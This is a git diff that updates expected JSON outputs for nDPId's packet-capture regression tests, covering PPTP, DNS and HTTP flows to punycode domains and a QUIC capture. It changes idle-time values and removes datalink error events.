+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-data-len":740,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1451895536574} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 diff --git a/test/results/punycode-idn.pcap.out b/test/results/punycode-idn.pcap.out index 5f90935cf..678bd87c3 100644 --- a/test/results/punycode-idn.pcap.out +++ b/test/results/punycode-idn.pcap.out @@ -10,14 +10,14 @@ 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874953695,"flow_last_seen":1643874953695,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953695,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643874953696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1643874953696,"pkt":"mAGnpQyTBBjWBrNaCABFAABDB3RAAEARrVjAqAIBwKgCjAA16vwALwOG+wWBgwABAAAAAAAAA3d3dw14bi0tbW5pY2gta3ZhA2NvbQAAAQAB"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874953696,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xn--mnich-kva.com","num_queries":1,"num_answers":0,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643874961730,"flow_last_seen":1643874961730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643874961730,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643874961730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961730,"pkt":"BBjWBrNamAGnpQyTCABFAABAAABAAEAGw3zAqAKMqiEJ5trLAFCDcwnXAAAAALAC\/\/\/UoQAAAgQFtAEDAwYBAQgKl2brUQAAAAAEAgAA"} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1643874961751,"pkt":"mAGnpQyTBBjWBrNaCABFAABAAABAADMG0HyqIQnmwKgCjABQ2svsD6nIg3MJ2LASFoCwBAAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643874961751,"pkt":"BBjWBrNamAGnpQyTCABFAAAoAABAAEAGw5TAqAKMqiEJ5trLAFCDcwnY7A+pyVAQ\/\/86WAAA"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":1068,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1643874962305} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 diff --git a/test/results/quic-mvfst-22_decryption_error.pcap.out b/test/results/quic-mvfst-22_decryption_error.pcap.out index 84cb3375d..66337668f 100644 --- a/test/results/quic-mvfst-22_decryption_error.pcap.out +++ b/test/results/quic-mvfst-22_decryption_error.pcap.out @@ -1,724 +1,24 @@ 00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593498296832} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296832} -01981{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7bpvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0eeFNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854cET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAapbBAABAEXAICuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -01222{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":698,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":698,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACurDPAABAEVPiCuYoqF5h4ZLy9AG7AqZJuU5AAkdWAc94e8TV08o58cInQhPfXEiH4R0yyR9AqFdJP97dW9QPxH5QALs4W48u\/A\/lmN+Z1gHpoOM1PLHjFfJbJb+kTSEeMOTQm72wgJFh+SbVesiWwZpXw+U97IhYBLP3WiFpBRQqDumQUeDiPkGwyTmNP9TNRpuF5QXHv1kPwiigyC2fJbgUUnl9e+zGQ79Cz8Bs\/eLwhmD1t2VJ7Cd7RuwKu2Fjort3XX4whsN7E7gB18XviaUhr5XnESzxgkyjbQ2IfYB1sJV2o4NiOWtS1g6oecOKw+P0SfmOdI8cA9W3q6oJEd81gYI3RSx3xGFnp9Oqu5Hc1vqbqNObKzndCPUi\/ewslI8ItQbC0BI4e50MqqScJSR\/5Vl6GG0TgIA0bMt3EG4lRLe0LXPxOgts4PbF21wxQKa7Tv1beWim5pfI+OGmD3DMiWSvIdPZw4l\/5hMQFemEjraWnBk1V\/\/OrAI2iv\/RsuB4yz9sORUhXLWck60hCb1uyIqNiRD+xW3bPH7r3P6z4UKMSlVVvqUDaRMdKibqynDHOOAWSj7+sP8Bf90ZLULJRyJUvi97ONtn16Gv8dO0\/jgeS3zlXeoqRUMEdvWBCLl6ExIUXPrzQxsNhsLrDhpW\/tDjV8bVc6b9OLSI4orbGjrxJjgcK689zWXeFHPekaWBT4LUjVMZvHiddSwc8CEIhbTIYZZ\/KM3XZ3ulglZV9+vPGct4VamjTqRcgHkoqQdwsrno2odIMs10yxJGOEmQN8Cw6E4hVNmBXDs81Q+k7pqJy1KFzOnCXOnG+YjtFuf9t7vMgoxn\/Mbid1XY3cSPVo6pJwkgIo3JrJMF3FGhAG1utFi6vz1QEXDtf6Aad0WCniKSed4SL+b04FPKN0pE40Yv1Qo="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -01222{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":698,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":698,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACurDPAABAEVPiCuYoqF5h4ZLy9AG7AqZJuU5AAkdWAc94e8TV08o58cInQhPfXEiH4R0yyR9AqFdJP97dW9QPxH5QALs4W48u\/A\/lmN+Z1gHpoOM1PLHjFfJbJb+kTSEeMOTQm72wgJFh+SbVesiWwZpXw+U97IhYBLP3WiFpBRQqDumQUeDiPkGwyTmNP9TNRpuF5QXHv1kPwiigyC2fJbgUUnl9e+zGQ79Cz8Bs\/eLwhmD1t2VJ7Cd7RuwKu2Fjort3XX4whsN7E7gB18XviaUhr5XnESzxgkyjbQ2IfYB1sJV2o4NiOWtS1g6oecOKw+P0SfmOdI8cA9W3q6oJEd81gYI3RSx3xGFnp9Oqu5Hc1vqbqNObKzndCPUi\/ewslI8ItQbC0BI4e50MqqScJSR\/5Vl6GG0TgIA0bMt3EG4lRLe0LXPxOgts4PbF21wxQKa7Tv1beWim5pfI+OGmD3DMiWSvIdPZw4l\/5hMQFemEjraWnBk1V\/\/OrAI2iv\/RsuB4yz9sORUhXLWck60hCb1uyIqNiRD+xW3bPH7r3P6z4UKMSlVVvqUDaRMdKibqynDHOOAWSj7+sP8Bf90ZLULJRyJUvi97ONtn16Gv8dO0\/jgeS3zlXeoqRUMEdvWBCLl6ExIUXPrzQxsNhsLrDhpW\/tDjV8bVc6b9OLSI4orbGjrxJjgcK689zWXeFHPekaWBT4LUjVMZvHiddSwc8CEIhbTIYZZ\/KM3XZ3ulglZV9+vPGct4VamjTqRcgHkoqQdwsrno2odIMs10yxJGOEmQN8Cw6E4hVNmBXDs81Q+k7pqJy1KFzOnCXOnG+YjtFuf9t7vMgoxn\/Mbid1XY3cSPVo6pJwkgIo3JrJMF3FGhAG1utFi6vz1QEXDtf6Aad0WCniKSed4SL+b04FPKN0pE40Yv1Qo="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -01222{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":698,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":698,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgCurDPAABAEVOqCuYoqF5h4ZLy9AG7AqZJuU5AAkdWAc94e8TV08o58cInQhPfXEiH4R0yyR9AqFdJP97dW9QPxH5QALs4W48u\/A\/lmN+Z1gHpoOM1PLHjFfJbJb+kTSEeMOTQm72wgJFh+SbVesiWwZpXw+U97IhYBLP3WiFpBRQqDumQUeDiPkGwyTmNP9TNRpuF5QXHv1kPwiigyC2fJbgUUnl9e+zGQ79Cz8Bs\/eLwhmD1t2VJ7Cd7RuwKu2Fjort3XX4whsN7E7gB18XviaUhr5XnESzxgkyjbQ2IfYB1sJV2o4NiOWtS1g6oecOKw+P0SfmOdI8cA9W3q6oJEd81gYI3RSx3xGFnp9Oqu5Hc1vqbqNObKzndCPUi\/ewslI8ItQbC0BI4e50MqqScJSR\/5Vl6GG0TgIA0bMt3EG4lRLe0LXPxOgts4PbF21wxQKa7Tv1beWim5pfI+OGmD3DMiWSvIdPZw4l\/5hMQFemEjraWnBk1V\/\/OrAI2iv\/RsuB4yz9sORUhXLWck60hCb1uyIqNiRD+xW3bPH7r3P6z4UKMSlVVvqUDaRMdKibqynDHOOAWSj7+sP8Bf90ZLULJRyJUvi97ONtn16Gv8dO0\/jgeS3zlXeoqRUMEdvWBCLl6ExIUXPrzQxsNhsLrDhpW\/tDjV8bVc6b9OLSI4orbGjrxJjgcK689zWXeFHPekaWBT4LUjVMZvHiddSwc8CEIhbTIYZZ\/KM3XZ3ulglZV9+vPGct4VamjTqRcgHkoqQdwsrno2odIMs10yxJGOEmQN8Cw6E4hVNmBXDs81Q+k7pqJy1KFzOnCXOnG+YjtFuf9t7vMgoxn\/Mbid1XY3cSPVo6pJwkgIo3JrJMF3FGhAG1utFi6vz1QEXDtf6Aad0WCniKSed4SL+b04FPKN0pE40Yv1Qo="} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPMFEAABAEUXrCuYoqF5h4ZLy9AG7ACgqG1dAAkdWAc94ex6CBM47\/CV4XqtIbZ\/afHzzTKnWtxqz"} -00196{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPMFEAABAEUXrCuYoqF5h4ZLy9AG7ACgqG1dAAkdWAc94ex6CBM47\/CV4XqtIbZ\/afHzzTKnWtxqz"} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296833} 